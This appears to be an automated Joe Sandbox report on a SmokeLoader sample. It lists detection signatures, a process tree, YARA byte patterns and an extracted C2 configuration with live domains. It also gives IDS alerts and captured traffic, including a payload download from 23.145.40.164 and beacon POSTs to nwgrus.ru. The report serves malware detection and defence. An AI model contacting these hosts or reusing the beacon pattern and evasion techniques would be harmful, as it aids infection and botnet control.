Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532238
MD5:f0342947877c844a5c82cb4bb5fdadad
SHA1:c460f35ed9f2b3fd6172f38c70b6073fffe70f17
SHA256:e93bc7594d1fc8ca1eff0e522b8547e74b3ac33840c55b4f50f69278e4cd8242
Tags:exeuser-Bitsight
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F0342947877C844A5C82CB4BB5FDADAD)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 565.exe (PID: 8020 cmdline: C:\Users\user\AppData\Local\Temp\565.exe MD5: F42E9B6758241070E7815B8BD1EB8335)
  • trbwcit (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\trbwcit MD5: F0342947877C844A5C82CB4BB5FDADAD)
  • fgbwcit (PID: 6596 cmdline: C:\Users\user\AppData\Roaming\fgbwcit MD5: F42E9B6758241070E7815B8BD1EB8335)
  • trbwcit (PID: 1432 cmdline: C:\Users\user\AppData\Roaming\trbwcit MD5: F0342947877C844A5C82CB4BB5FDADAD)
  • fgbwcit (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\fgbwcit MD5: F42E9B6758241070E7815B8BD1EB8335)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x350e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    Click to see the 19 entries

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\trbwcit, CommandLine: C:\Users\user\AppData\Roaming\trbwcit, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\trbwcit, NewProcessName: C:\Users\user\AppData\Roaming\trbwcit, OriginalFileName: C:\Users\user\AppData\Roaming\trbwcit, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\trbwcit, ProcessId: 7852, ProcessName: trbwcit
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:28:34.855747+020020391031A Network Trojan was detected192.168.2.449738190.147.128.17280TCP
    2024-10-12T22:28:36.179777+020020391031A Network Trojan was detected192.168.2.449739190.147.128.17280TCP
    2024-10-12T22:28:37.301512+020020391031A Network Trojan was detected192.168.2.449740190.147.128.17280TCP
    2024-10-12T22:28:38.679060+020020391031A Network Trojan was detected192.168.2.449741190.147.128.17280TCP
    2024-10-12T22:28:39.768855+020020391031A Network Trojan was detected192.168.2.449742190.147.128.17280TCP
    2024-10-12T22:28:40.836305+020020391031A Network Trojan was detected192.168.2.449743190.147.128.17280TCP
    2024-10-12T22:28:42.152277+020020391031A Network Trojan was detected192.168.2.449744190.147.128.17280TCP
    2024-10-12T22:28:43.239304+020020391031A Network Trojan was detected192.168.2.449745190.147.128.17280TCP
    2024-10-12T22:28:44.333751+020020391031A Network Trojan was detected192.168.2.449746190.147.128.17280TCP
    2024-10-12T22:28:45.434201+020020391031A Network Trojan was detected192.168.2.449747190.147.128.17280TCP
    2024-10-12T22:28:46.545952+020020391031A Network Trojan was detected192.168.2.449748190.147.128.17280TCP
    2024-10-12T22:28:47.805965+020020391031A Network Trojan was detected192.168.2.449749190.147.128.17280TCP
    2024-10-12T22:28:48.888009+020020391031A Network Trojan was detected192.168.2.449750190.147.128.17280TCP
    2024-10-12T22:28:49.963152+020020391031A Network Trojan was detected192.168.2.449751190.147.128.17280TCP
    2024-10-12T22:28:51.038576+020020391031A Network Trojan was detected192.168.2.449752190.147.128.17280TCP
    2024-10-12T22:28:52.162158+020020391031A Network Trojan was detected192.168.2.449753190.147.128.17280TCP
    2024-10-12T22:28:53.210807+020020391031A Network Trojan was detected192.168.2.449754190.147.128.17280TCP
    2024-10-12T22:28:54.287233+020020391031A Network Trojan was detected192.168.2.449755190.147.128.17280TCP
    2024-10-12T22:28:55.393275+020020391031A Network Trojan was detected192.168.2.449756190.147.128.17280TCP
    2024-10-12T22:28:56.468350+020020391031A Network Trojan was detected192.168.2.449757190.147.128.17280TCP
    2024-10-12T22:28:57.586832+020020391031A Network Trojan was detected192.168.2.449758190.147.128.17280TCP
    2024-10-12T22:28:58.647677+020020391031A Network Trojan was detected192.168.2.449760190.147.128.17280TCP
    2024-10-12T22:28:59.810217+020020391031A Network Trojan was detected192.168.2.449767190.147.128.17280TCP
    2024-10-12T22:29:00.890699+020020391031A Network Trojan was detected192.168.2.449773190.147.128.17280TCP
    2024-10-12T22:29:03.439980+020020391031A Network Trojan was detected192.168.2.449790190.147.128.17280TCP
    2024-10-12T22:29:04.556178+020020391031A Network Trojan was detected192.168.2.449796190.147.128.17280TCP
    2024-10-12T22:29:06.138823+020020391031A Network Trojan was detected192.168.2.449802190.147.128.17280TCP
    2024-10-12T22:29:07.242035+020020391031A Network Trojan was detected192.168.2.449808190.147.128.17280TCP
    2024-10-12T22:29:08.323623+020020391031A Network Trojan was detected192.168.2.449819190.147.128.17280TCP
    2024-10-12T22:29:09.405245+020020391031A Network Trojan was detected192.168.2.449825190.147.128.17280TCP
    2024-10-12T22:29:10.496935+020020391031A Network Trojan was detected192.168.2.449832190.147.128.17280TCP
    2024-10-12T22:29:11.577113+020020391031A Network Trojan was detected192.168.2.449841190.147.128.17280TCP
    2024-10-12T22:29:12.665671+020020391031A Network Trojan was detected192.168.2.449847190.147.128.17280TCP
    2024-10-12T22:29:13.773014+020020391031A Network Trojan was detected192.168.2.449853190.147.128.17280TCP
    2024-10-12T22:29:15.061716+020020391031A Network Trojan was detected192.168.2.449859190.147.128.17280TCP
    2024-10-12T22:29:16.143581+020020391031A Network Trojan was detected192.168.2.449870190.147.128.17280TCP
    2024-10-12T22:30:26.260553+020020391031A Network Trojan was detected192.168.2.450043190.147.128.17280TCP
    2024-10-12T22:30:33.005730+020020391031A Network Trojan was detected192.168.2.450044190.147.128.17280TCP
    2024-10-12T22:30:42.007630+020020391031A Network Trojan was detected192.168.2.450045190.147.128.17280TCP
    2024-10-12T22:30:52.824767+020020391031A Network Trojan was detected192.168.2.450046190.147.128.17280TCP
    2024-10-12T22:31:06.258519+020020391031A Network Trojan was detected192.168.2.450047175.119.10.23180TCP
    2024-10-12T22:31:20.968526+020020391031A Network Trojan was detected192.168.2.450048175.119.10.23180TCP
    2024-10-12T22:31:36.114550+020020391031A Network Trojan was detected192.168.2.450049175.119.10.23180TCP
    2024-10-12T22:31:50.445964+020020391031A Network Trojan was detected192.168.2.450050175.119.10.23180TCP
    2024-10-12T22:32:05.414626+020020391031A Network Trojan was detected192.168.2.450051175.119.10.23180TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
    Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
    Source: C:\Users\user\AppData\Roaming\trbwcitReversingLabs: Detection: 36%
    Source: file.exeReversingLabs: Detection: 36%
    Source: file.exeVirustotal: Detection: 39%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\fgbwcitJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\trbwcitJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\565.exeJoe Sandbox ML: detected
    Source: file.exeJoe Sandbox ML: detected
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49779 version: TLS 1.2

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49802 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49825 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49853 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49808 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49870 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49796 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49847 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49841 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 175.119.10.231:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 175.119.10.231:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49832 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 175.119.10.231:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 175.119.10.231:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49859 -> 190.147.128.172:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 175.119.10.231:80
    Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 190.147.128.172 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
    Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
    Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
    Source: Joe Sandbox ViewIP Address: 175.119.10.231 175.119.10.231
    Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
    Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbokbuwfpvoxbkg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pixlrdkntmlnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bycmgoqasptpbarq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkmjhgiqxobee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guwkkhaqmlu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipxaqeyacookwjhd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjjppebnfln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giecrmryibj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftxsovsyqtpojv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdnqdofcypmiflj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sfxppmjegqvmfflo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdvavhcwwpnmuonq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvliyttnwva.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lcuvnbvrwwue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xabseqytshw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bimvjobubxq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxrarkndhoucempk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkknpuucklp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pegvelqjknxdu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgelocrsuxurnrn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xggjjjlvylvfsyxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpiicsehdjnbnsmw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rustqqxkqobo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fvvqfcjwkkyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jskfymbttqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfmmhijnsahycef.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmtmmuxeespeb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oetcuqsferjcffw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykmrlqvmvtweyurg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htfrpafyilhcsfrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uphnbpophmmckayq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
